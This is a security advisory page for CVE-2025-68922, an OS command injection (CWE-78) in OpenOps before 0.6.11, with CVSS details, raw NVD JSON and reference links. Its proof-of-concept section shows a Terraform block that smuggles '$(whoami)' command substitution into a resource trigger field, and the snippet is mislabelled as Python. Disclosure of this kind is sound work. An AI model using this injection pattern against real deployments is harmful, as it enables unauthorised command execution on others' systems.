Security Vulnerability Report
中文
CVE-2025-68922 CVSS 7.4 HIGH

CVE-2025-68922

Published: 2025-12-25 00:16:04
Last Modified: 2026-04-15 00:35:42

Description

OpenOps before 0.6.11 allows remote code execution in the Terraform block.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

OpenOps < 0.6.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
terraform { resource "null_resource" "poc" { triggers = { trigger = "$(whoami)" } } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68922", "sourceIdentifier": "[email protected]", "published": "2025-12-25T00:16:03.833", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenOps before 0.6.11 allows remote code execution in the Terraform block."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/openops-cloud/openops/compare/0.6.10...0.6.11", "source": "[email protected]"}, {"url": "https://github.com/openops-cloud/openops/pull/1767", "source": "[email protected]"}, {"url": "https://github.com/openops-cloud/openops/releases/tag/0.6.11", "source": "[email protected]"}, {"url": "https://linear.app/openops/issue/OPS-3254", "source": "[email protected]"}]}}